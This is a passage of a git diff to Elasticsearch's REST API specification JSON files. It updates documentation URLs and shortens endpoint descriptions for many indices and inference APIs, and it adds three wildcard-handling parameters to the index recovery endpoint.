"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_data_stream.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_data_stream.json index 2a95e2552bb33..7c59270862b04 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_data_stream.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_data_stream.json @@ -1,8 +1,8 @@ { "indices.get_data_stream":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams.html", - "description":"Returns data streams." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-get-data-stream", + "description":"Get data streams" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_data_stream_options.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_data_stream_options.json index c882dc7f7b0a9..78ce97daa0d9c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_data_stream_options.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_data_stream_options.json @@ -1,8 +1,8 @@ { "indices.get_data_stream_options":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/index.html", - "description":"Returns the data stream options of the selected data streams." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-get-data-stream-options", + "description":"Get data stream options" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_data_stream_settings.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_data_stream_settings.json index 15271890a3b79..625f53a5fed51 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_data_stream_settings.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_data_stream_settings.json @@ -1,8 +1,8 @@ { "indices.get_data_stream_settings":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams.html", - "description":"Gets a data stream's settings" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-get-data-stream-settings", + "description":"Get data stream settings" }, "stability":"stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_field_mapping.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_field_mapping.json index 19b3ac54769cc..2329043d93890 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_field_mapping.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_field_mapping.json @@ -1,8 +1,8 @@ { "indices.get_field_mapping":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-get-field-mapping.html", - "description":"Returns mapping for one or more fields." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-get-mapping", + "description":"Get mapping definitions" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_index_template.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_index_template.json index f0351ce8cfe94..fdf03960defee 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_index_template.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_index_template.json @@ -1,8 +1,8 @@ { "indices.get_index_template":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-get-template.html", - "description":"Returns an index template." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-get-index-template", + "description":"Get index templates" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_mapping.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_mapping.json index aef4713102553..afc259d84e095 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_mapping.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_mapping.json @@ -1,8 +1,8 @@ { "indices.get_mapping":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-get-mapping.html", - "description":"Returns mappings for one or more indices." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-get-mapping", + "description":"Get mapping definitions" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_migrate_reindex_status.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_migrate_reindex_status.json index d166f3e99197b..2bc1932513a30 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_migrate_reindex_status.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_migrate_reindex_status.json @@ -1,8 +1,8 @@ { "indices.get_migrate_reindex_status":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/data-stream-reindex-status-api.html", - "description":"This API returns the status of a migration reindex attempt for a data stream or index" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-migration", + "description":"Get the migration reindexing status" }, "stability":"experimental", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_settings.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_settings.json index 61e785abdfb84..05d5a201b1efd 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_settings.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_settings.json @@ -1,8 +1,8 @@ { "indices.get_settings":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-get-settings.html", - "description":"Returns settings for one or more indices." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-get-settings", + "description":"Get index settings" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_template.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_template.json index 74fdd1ef5c8a1..7d691a624069d 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_template.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_template.json @@ -1,8 +1,8 @@ { "indices.get_template":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-get-template-v1.html", - "description":"Returns an index template." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-get-template", + "description":"Get legacy index templates" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.migrate_reindex.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.migrate_reindex.json index 28cef97c7360a..ad9f8427ec3ec 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.migrate_reindex.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.migrate_reindex.json @@ -1,8 +1,8 @@ { "indices.migrate_reindex":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/data-stream-reindex-api.html", - "description":"This API reindexes all legacy backing indices for a data stream. It does this in a persistent task. The persistent task id is returned immediately, and the reindexing work is completed in that task" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-migrate-reindex", + "description":"Reindex legacy backing indices" }, "stability":"experimental", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.migrate_to_data_stream.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.migrate_to_data_stream.json index 879f086cc0675..7d8836b8c7753 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.migrate_to_data_stream.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.migrate_to_data_stream.json @@ -1,8 +1,8 @@ { "indices.migrate_to_data_stream":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams.html", - "description":"Migrates an alias to a data stream" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-migrate-to-data-stream", + "description":"Convert an index alias to a data stream" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.modify_data_stream.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.modify_data_stream.json index ea095289b72bc..8ccddf926f725 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.modify_data_stream.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.modify_data_stream.json @@ -1,8 +1,8 @@ { "indices.modify_data_stream":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams.html", - "description":"Modifies a data stream" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-modify-data-stream", + "description":"Update data streams" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.open.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.open.json index e6c1646d2b01b..8f9db2e98629b 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.open.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.open.json @@ -1,8 +1,8 @@ { "indices.open":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-open-close.html", - "description":"Opens an index." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-open", + "description":"Open a closed index" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.promote_data_stream.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.promote_data_stream.json index 8c4c747fa8c16..67097fa433673 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.promote_data_stream.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.promote_data_stream.json @@ -1,8 +1,8 @@ { "indices.promote_data_stream":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams.html", - "description":"Promotes a data stream from a replicated data stream managed by CCR to a regular data stream" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-promote-data-stream", + "description":"Promote a data stream" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_alias.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_alias.json index 953f119a30a3f..2260449ba7164 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_alias.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_alias.json @@ -1,8 +1,8 @@ { "indices.put_alias":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-aliases.html", - "description":"Creates or updates an alias." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-put-alias", + "description":"Create or update an alias" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_data_lifecycle.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_data_lifecycle.json index 0a2f7b33498cf..4b08e53f90278 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_data_lifecycle.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_data_lifecycle.json @@ -1,8 +1,8 @@ { "indices.put_data_lifecycle":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams-put-lifecycle.html", - "description":"Updates the data stream lifecycle of the selected data streams." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-put-data-lifecycle", + "description":"Update data stream lifecycles" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_data_stream_options.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_data_stream_options.json index 45c51cdec6282..7fb4a354bc0cc 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_data_stream_options.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_data_stream_options.json @@ -1,8 +1,8 @@ { "indices.put_data_stream_options":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/index.html", - "description":"Updates the data stream options of the selected data streams." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-put-data-stream-options", + "description":"Update data stream options" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_data_stream_settings.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_data_stream_settings.json index b358c2d3c864f..290c897fc3a6b 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_data_stream_settings.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_data_stream_settings.json @@ -1,8 +1,8 @@ { "indices.put_data_stream_settings":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams.html", - "description":"Updates a data stream's settings" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-put-data-stream-settings", + "description":"Update data stream settings" }, "stability":"stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_index_template.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_index_template.json index 00f6ac88eab45..bdac7e8d51cec 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_index_template.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_index_template.json @@ -1,8 +1,8 @@ { "indices.put_index_template":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-put-template.html", - "description":"Creates or updates an index template." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-put-index-template", + "description":"Create or update an index template" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_mapping.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_mapping.json index 266a926f8f49c..64743085050bf 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_mapping.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_mapping.json @@ -1,8 +1,8 @@ { "indices.put_mapping":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-put-mapping.html", - "description":"Updates the index mappings." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-put-mapping", + "description":"Update field mappings" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_settings.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_settings.json index 08134e211a312..f2760363c71b8 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_settings.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_settings.json @@ -1,8 +1,8 @@ { "indices.put_settings":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-update-settings.html", - "description":"Updates the index settings." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-put-settings", + "description":"Update index settings" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_template.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_template.json index 492a47c19a19b..8036417531c18 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_template.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_template.json @@ -1,8 +1,8 @@ { "indices.put_template":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-templates-v1.html", - "description":"Creates or updates an index template." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-put-template", + "description":"Create or update a legacy index template" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.recovery.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.recovery.json index b1174b89df0bd..2aeeaba0ef924 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.recovery.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.recovery.json @@ -1,8 +1,8 @@ { "indices.recovery":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-recovery.html", - "description":"Returns information about ongoing index shard recoveries." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-recovery", + "description":"Get index recovery information" }, "stability":"stable", "visibility":"public", @@ -41,6 +41,28 @@ "type":"boolean", "description":"Display only those recoveries that are currently on-going", "default":false + }, + "ignore_unavailable":{ + "type":"boolean", + "description":"Whether specified concrete indices should be ignored when unavailable (missing or closed)", + "default":false + }, + "allow_no_indices":{ + "type":"boolean", + "description":"Whether to ignore if a wildcard indices expression resolves into no concrete indices. (This includes `_all` string or when no indices have been specified)", + "default":true + }, + "expand_wildcards":{ + "type":"enum", + "options":[ + "open", + "closed", + "hidden", + "none", + "all" + ], + "default":"open", + "description":"Whether to expand wildcard expression to concrete indices that are open, closed or both." } } } diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.refresh.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.refresh.json index 0932d77e93401..424e40c813e54 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.refresh.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.refresh.json @@ -1,8 +1,8 @@ { "indices.refresh":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-refresh.html", - "description":"Performs the refresh operation in one or more indices." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-refresh", + "description":"Refresh an index" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.reload_search_analyzers.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.reload_search_analyzers.json index c158e524683fe..d8872c9c8292e 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.reload_search_analyzers.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.reload_search_analyzers.json @@ -1,8 +1,8 @@ { "indices.reload_search_analyzers":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-reload-analyzers.html", - "description":"Reloads an index's search analyzers and their resources." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-reload-search-analyzers", + "description":"Reload search analyzers" }, "stability" : "stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.remove_block.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.remove_block.json index da5f9237422e4..1eeda64556da4 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.remove_block.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.remove_block.json @@ -1,8 +1,8 @@ { "indices.remove_block": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/index-modules-blocks.html", - "description": "Removes a block from an index." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-remove-block", + "description": "Remove an index block" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.resolve_cluster.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.resolve_cluster.json index c41233664de0e..c848bba18cb42 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.resolve_cluster.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.resolve_cluster.json @@ -1,8 +1,8 @@ { "indices.resolve_cluster": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-resolve-cluster-api.html", - "description": "Resolves the specified index expressions to return information about each cluster. If no index expression is provided, this endpoint will return information about all the remote clusters that are configured on the local cluster." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-resolve-cluster", + "description": "Resolve the cluster" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.resolve_index.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.resolve_index.json index e27e3a0450bff..770aa8c5ec595 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.resolve_index.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.resolve_index.json @@ -1,8 +1,8 @@ { "indices.resolve_index":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-resolve-index-api.html", - "description":"Returns information about any matching indices, aliases, and data streams" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-resolve-index", + "description":"Resolve indices" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.rollover.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.rollover.json index 47a1bee665506..bcb405a1dc10b 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.rollover.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.rollover.json @@ -1,8 +1,8 @@ { "indices.rollover":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-rollover-index.html", - "description":"Updates an alias to point to a new index when the existing index\nis considered to be too large or too old." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-rollover", + "description":"Roll over to a new index" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.segments.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.segments.json index 5e75caaae4bc6..6b8695a4e6a9d 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.segments.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.segments.json @@ -1,8 +1,8 @@ { "indices.segments":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-segments.html", - "description":"Provides low-level information about segments in a Lucene index." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-segments", + "description":"Get index segments" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.shard_stores.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.shard_stores.json index 739107dc68681..0d8708aebfa7e 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.shard_stores.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.shard_stores.json @@ -1,8 +1,8 @@ { "indices.shard_stores":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-shards-stores.html", - "description":"Provides store information for shard copies of indices." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-shard-stores", + "description":"Get index shard stores" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.shrink.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.shrink.json index cc9bc7c1e2de3..d28ca655afbdc 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.shrink.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.shrink.json @@ -1,8 +1,8 @@ { "indices.shrink":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-shrink-index.html", - "description":"Allow to shrink an existing index into a new index with fewer primary shards." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-shrink", + "description":"Shrink an index" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.simulate_index_template.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.simulate_index_template.json index e12b5116ffcdf..57c23ef9fbb1c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.simulate_index_template.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.simulate_index_template.json @@ -1,8 +1,8 @@ { "indices.simulate_index_template":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-simulate-index.html", - "description": "Simulate matching the given index name against the index templates in the system" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-simulate-index-template", + "description": "Simulate an index" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.simulate_template.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.simulate_template.json index 7958454564c83..3b805ec0ba0d0 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.simulate_template.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.simulate_template.json @@ -1,8 +1,8 @@ { "indices.simulate_template":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-simulate-template.html", - "description": "Simulate resolving the given template name or body" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-simulate-template", + "description": "Simulate an index template" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.split.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.split.json index ed623fd130cc6..8b2169e0014c3 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.split.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.split.json @@ -1,8 +1,8 @@ { "indices.split":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-split-index.html", - "description":"Allows you to split an existing index into a new index with more primary shards." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-split", + "description":"Split an index" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.stats.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.stats.json index faafdfcdb588a..53fd94c15554a 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.stats.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.stats.json @@ -1,8 +1,8 @@ { "indices.stats":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-stats.html", - "description":"Provides statistics on operations happening in an index." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-stats", + "description":"Get index statistics" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.update_aliases.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.update_aliases.json index 76b33ad11d961..d6a5b62fafc2c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.update_aliases.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.update_aliases.json @@ -1,8 +1,8 @@ { "indices.update_aliases":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-aliases.html", - "description":"Updates index aliases." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-update-aliases", + "description":"Create or update an alias" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.validate_query.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.validate_query.json index 44fbfa18a2261..13cd9527a15fa 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.validate_query.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.validate_query.json @@ -1,8 +1,8 @@ { "indices.validate_query":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/search-validate.html", - "description":"Allows a user to validate a potentially expensive query without executing it." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-validate-query", + "description":"Validate a query" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.chat_completion_unified.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.chat_completion_unified.json index 98854625d0471..16f3afcccf2ed 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.chat_completion_unified.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.chat_completion_unified.json @@ -1,7 +1,7 @@ { "inference.chat_completion_unified": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/chat-completion-inference.html", + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-unified-inference", "description": "Perform chat completion inference" }, "stability": "stable", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.completion.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.completion.json index 6c753e59e3434..9ac696d279de7 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.completion.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.completion.json @@ -1,8 +1,8 @@ { "inference.completion": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/post-inference-api.html", - "description": "Perform completion inference" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-inference", + "description": "Perform completion inference on the service" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.delete.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.delete.json index cb4eee007a246..1ffe8d1e3e664 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.delete.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.delete.json @@ -1,7 +1,7 @@ { "inference.delete": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/delete-inference-api.html", + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-delete", "description": "Delete an inference endpoint" }, "stability": "stable", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.get.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.get.json index 8887d9d0a1ebe..8612869a2b7f0 100644 --- 